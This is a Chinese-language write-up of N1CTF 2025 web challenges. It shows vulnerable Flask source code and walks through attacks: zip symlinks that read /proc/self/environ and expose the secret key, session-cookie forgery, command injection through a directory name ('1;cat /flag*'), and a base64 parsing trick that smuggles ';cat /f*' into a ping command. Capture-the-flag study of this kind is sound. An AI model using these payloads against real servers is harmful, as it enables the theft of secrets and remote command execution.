2025N1CTF


online_unzipper

考点:软链接

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
import os
import uuid
from flask import Flask, request, redirect, url_for, send_file, render_template, session, send_from_directory, abort, Response

# 创建Flask应用实例,__name__用于确定应用根目录以便查找资源
app = Flask(__name__)
# 设置应用的密钥,用于加密会话(session)。优先从环境变量FLASK_SECRET_KEY获取,若未设置则使用默认值'test_key'(生产环境应避免使用默认值)
app.secret_key = os.environ.get("FLASK_SECRET_KEY", "test_key")
# 定义文件上传的目录路径,这里设置为当前工作目录下的"uploads"文件夹
UPLOAD_FOLDER = os.path.join(os.getcwd(), "uploads")
# 确保上传目录存在,exist_ok=True表示如果目录已存在也不会引发错误
os.makedirs(UPLOAD_FOLDER, exist_ok=True)

# 用一个简单的字典模拟用户数据库,存储用户名和用户信息(密码和角色)
users = {}

@app.route("/")
def index():
    """
    根路径路由。
    检查用户是否已登录(即session中是否有username)。如果未登录,重定向到登录页面;如果已登录,重定向到上传页面。
    """
    if "username" not in session:
        return redirect(url_for("login"))
    return redirect(url_for("upload"))

@app.route("/register", methods=["GET", "POST"])
def register():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]

        if username in users:
            return "用户名已存在"

        users[username] = {"password": password, "role": "user"}
        return redirect(url_for("login"))

    return render_template("register.html")

@app.route("/login", methods=["GET", "POST"])
def login():

    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]

        if username in users and users[username]["password"] == password:
            session["username"] = username
            session["role"] = users[username]["role"]
            return redirect(url_for("upload"))
        else:
            return "用户名或密码错误"

    return render_template("login.html")

@app.route("/logout")
def logout():
    """
    用户登出路由。
    清除session中的所有数据,重定向到登录页面。
    """
    session.clear()
    return redirect(url_for("login"))

@app.route("/upload", methods=["GET", "POST"])
def upload():
    """
      * 管理员(admin)可以选择使用表单提供的dirname或自动生成一个UUID作为目录名。
      * 普通用户(user)使用自动生成的UUID作为目录名。
      - 在上传目录下创建目标子目录。
      - 将上传的zip文件保存到目标目录中,命名为'upload.zip'。
      - 尝试使用系统命令解压该zip文件到目标目录。
      - 删除原始的zip文件。
      - 返回解压成功信息和一个指向下载页面的链接。
    """
    if "username" not in session:
        return redirect(url_for("login"))

    if request.method == "POST":
        file = request.files["file"]
        if not file:
            return "未选择文件"

        role = session["role"]

        if role == "admin":
            dirname = request.form.get("dirname") or str(uuid.uuid4())
        else:
            dirname = str(uuid.uuid4())

        target_dir = os.path.join(UPLOAD_FOLDER, dirname)
        os.makedirs(target_dir, exist_ok=True)

        zip_path = os.path.join(target_dir, "upload.zip")
        file.save(zip_path)

        try:
            os.system(f"unzip -o {zip_path} -d {target_dir}")
        except:
            return "解压失败,请检查文件格式"

        os.remove(zip_path)
        return f"解压完成!<br>下载地址: <a href='{url_for('download', folder=dirname)}'>{request.host_url}download/{dirname}</a>"

    return render_template("upload.html")

@app.route("/download/<folder>")
def download(folder):
    """
    文件下载列表页面路由。
    根据URL中的folder参数,定位到上传目录下的具体子目录。
    检查该子目录是否存在,不存在则返回404错误。
    获取该子目录下的文件列表,并渲染下载页面模板,将文件夹名和文件列表传递给模板。
    """
    target_dir = os.path.join(UPLOAD_FOLDER, folder)
    if not os.path.exists(target_dir):
        abort(404)

    files = os.listdir(target_dir)
    return render_template("download.html", folder=folder, files=files)

@app.route("/download/<folder>/<filename>")
def download_file(folder, filename):
    """
    单个文件下载路由。
    根据URL中的folder和filename参数,构建文件的完整路径。
    尝试打开文件并读取内容,然后返回一个Response对象,设置适当的MIME类型和Content-Disposition头部以触发浏览器下载。
    如果文件不存在,返回404错误;其他错误返回500错误。
    """
    file_path = os.path.join(UPLOAD_FOLDER, folder, filename)
    try:
        with open(file_path, 'r') as file: # 注意:对于二进制文件(如图片),应使用'rb'模式
            content = file.read()
        return Response(
            content,
            mimetype="application/octet-stream",
            headers={
                "Content-Disposition": f"attachment; filename={filename}"
            }
        )
    except FileNotFoundError:
        return "File not found", 404
    except Exception as e:
        return f"Error: {str(e)}", 500

if __name__ == "__main__":
    # 启动Flask开发服务器,监听所有公共IP(0.0.0.0)
    app.run(host="0.0.0.0")

打软链接,在虚拟机进行下面命令

1
ln -s /proc/self/environ link
1
zip --symlinks link.zip link

上传下载link文件得到密钥是#mu0cw9F#7bBCoF!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
from flask import Flask, session
from flask.sessions import SecureCookieSessionInterface
import base64
import json
import os

app = Flask(__name__)
app.secret_key =  '#mu0cw9F#7bBCoF!'

# 创建一个会话对象
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

# 要序列化的数据
data = {"role":"admin","username":"root"}

# 序列化并加密数据
serialized = session_serializer.dumps(data)
print("Encoded session:", serialized)

# 如果需要解码,可以使用以下代码
decoded = session_serializer.loads(serialized)
print("Decoded session:", decoded)

接下来怎么办?看附件知道,flag文件名不能准确知道

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
set -e

RAND=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 32)
FLAG_FILE="/flag-$RAND.txt"

if [ -n "$FLAG" ]; then
    echo "$FLAG" > "$FLAG_FILE"
fi

unset FLAG
export FLAG=""

exec "$@"

但是我们伪造了admin后dirname已经是可控的了,所以可以在 os.system(f"unzip -o {zip_path} -d {target_dir}")里面执行命令,所以怎么办?打

1
1;cat /flag* > /tmp/2.txt

然后继续软链接拿flag

1
2
ln -s /tmp/2.txt link
zip --symlinks link.zip link

这里是构造了命令,来一个软链接拿flag

解法二

一样伪造admin后

1
2
3
ln -s / torootpath

zip --symlinks rootlink.zip torootpath

先将根目录指向torootpath,然后就让文件解压在uploads下

image-20251125203948691 image-20251125203757259

访问/download/torootpath,(因为@app.route("/download/<folder>/<filename>")是展示目录,而torootpath指向根,所以访问/download/torootpath就是等于访问根目录),直接点击拿flag即可

解法二参考https://c1oudfl0w0.github.io/blog/2025/09/13/N1CTF-Junior-2025-2-2/#online-unzipper

ping

考点:利用python与Lunix解析base64的差异指向命令

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import base64
import subprocess
import re
import ipaddress
import flask

def run_ping(ip_base64):
    try:
        decoded_ip = base64.b64decode(ip_base64).decode('utf-8')
        if not re.match(r'^\d+\.\d+\.\d+\.\d+$', decoded_ip):
            return False
        if decoded_ip.count('.') != 3:
            return False
        
        if not all(0 <= int(part) < 256 for part in decoded_ip.split('.')):
            return False
        if not ipaddress.ip_address(decoded_ip):
            return False
        if len(decoded_ip) > 15:
            return False
        if not re.match(r'^[A-Za-z0-9+/=]+$', ip_base64):
            return False
    except Exception as e:
        return False
    command = f"""echo "ping -c 1 $(echo '{ip_base64}' | base64 -d)" | sh"""

    try:
        process = subprocess.run(
            command,
            shell=True,
            check=True,
            capture_output=True,
            text=True
        )
        return process.stdout
    except Exception as e:
        return False

app = flask.Flask(__name__)

@app.route('/ping', methods=['POST'])
def ping():
    data = flask.request.json
    ip_base64 = data.get('ip_base64')
    if not ip_base64:
        return flask.jsonify({'error': 'no ip'}), 400

    result = run_ping(ip_base64)
    if result:
        return flask.jsonify({'success': True, 'output': result}), 200
    else:
        return flask.jsonify({'success': False}), 400

@app.route('/')
def index():
    return flask.render_template('index.html')

app.run(host='0.0.0.0', port=5000)

这个waf检测

1
2
3
4
检测是否为合法 IPv4 格式
检测是否每个字段都在 0~255 范围内
检测字母字符
检测长度限制

常规不可能绕过,只能利用Lunix与python中的base64库的解析差异,当python中解析base64时遇到=后不会对后面的字符进行解码,但是Lunix命令会

image-20251125212735817

image-20251125212814372

所以我们直接将0.0.0.0编码得到

1
MC4wLjAuMA==

;ls /base64编码为O2xzIC8=,拼接就是

1
MC4wLjAuMQ==O2xzIC8=

image-20251125214828257

接下来直接拿flag,;cat /f*

1
MC4wLjAuMQ==O2NhdCAvZio=

image-20251125215042389

Peek a Fork

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
import socket
import os
import hashlib
import fcntl
import re
import mmap

with open('flag.txt', 'rb') as f:
    flag = f.read()
mm = mmap.mmap(-1, len(flag))
mm.write(flag)
os.remove('flag.txt')

FORBIDDEN = [b'flag', b'proc', b'<', b'>', b'^', b"'", b'"', b'..', b'./']
PAGE = """<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Secure Gateway</title>
    <style>
        body { font-family: 'Courier New', monospace; background-color: #0c0c0c; color: #00ff00; text-align: center; margin-top: 10%; }
        .container { border: 1px solid #00ff00; padding: 2rem; display: inline-block; }
        h1 { font-size: 2.5rem; text-shadow: 0 0 5px #00ff00; }
        p { font-size: 1.2rem; }
        .status { color: #ffff00; }
    </style>
</head>
<body>
    <div class="container">
        <h1>Firewall</h1>
        <p class="status">STATUS: All systems operational.</p>
        <p>Your connection has been inspected.</p>
    </div>
</body>
</html>"""

def handle_connection(conn, addr, log, factor=1):
    try:
        conn.settimeout(10.0)

        if log:
            with open('log.txt', 'a') as f:
                fcntl.flock(f, fcntl.LOCK_EX)
                log_bytes = f"{addr[0]}:{str(addr[1])}:{str(conn)}".encode()
                for _ in range(factor):
                    log_bytes = hashlib.sha3_256(log_bytes).digest()
                log_entry = log_bytes.hex() + "\n"
                f.write(log_entry)
                
        request_data = conn.recv(256)
        if not request_data.startswith(b"GET /"):
            response = b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request"
            conn.sendall(response)
            return
        try:
            path = request_data.split(b' ')[1]
            pattern = rb'\?offset=(\d+)&length=(\d+)'
            
            offset = 0
            length = -1

            match = re.search(pattern, path)

            if match:
                offset = int(match.group(1).decode())
                length = int(match.group(2).decode())
                
                clean_path = re.sub(pattern, b'', path)
                filename = clean_path.strip(b'/').decode()
            else:
                filename = path.strip(b'/').decode()

        except Exception:
            response = b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request"
            conn.sendall(response)
            return

        if not filename:
            response_body = PAGE
            response_status = "200 OK"
        else:
            try:
                with open(os.path.normpath(filename), 'rb') as f:
                    if offset > 0:
                        f.seek(offset)
                    
                    data_bytes = f.read(length)
                    response_body = data_bytes.decode('utf-8', 'ignore')
                response_status = "200 OK"
            except Exception as e:
                response_body = f"Invalid path"
                response_status = "500 Internal Server Error"

        response = f"HTTP/1.1 {response_status}\r\nContent-Length: {len(response_body)}\r\n\r\n{response_body}"
        conn.sendall(response.encode())
        
    except Exception:
        pass
    finally:
        conn.close()
        os._exit(0)

def main():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', 1337))
    server.listen(50)
    print(f"Server listening on port 1337...")

    while True:
        try:
            pid, status = os.waitpid(-1, os.WNOHANG)
        except ChildProcessError:
            pass
        conn, addr = server.accept()

        initial_data = conn.recv(256, socket.MSG_PEEK)
        if any(term in initial_data.lower() for term in FORBIDDEN):
            conn.sendall(b"HTTP/1.1 403 Forbidden\r\n\r\nSuspicious request pattern detected.")
            conn.close()
            continue
            
        if initial_data.startswith(b'GET /?log=1'):
            try:
                factor = 1
                pattern = rb"&factor=(\d+)"
                match = re.search(pattern, initial_data)
                if match:
                    factor = int(match.group(1).decode())
                pid = os.fork()
                if pid == 0:
                    server.close()
                    handle_connection(conn, addr, True, factor)
            except Exception as e:
                print("[ERROR]: ", e)
            finally:
                conn.close()
                continue
        else:
            pid = os.fork()
            if pid == 0:
                server.close()
                handle_connection(conn, addr, False)
        
        conn.close()

if __name__ == '__main__':
    main()
谢谢观看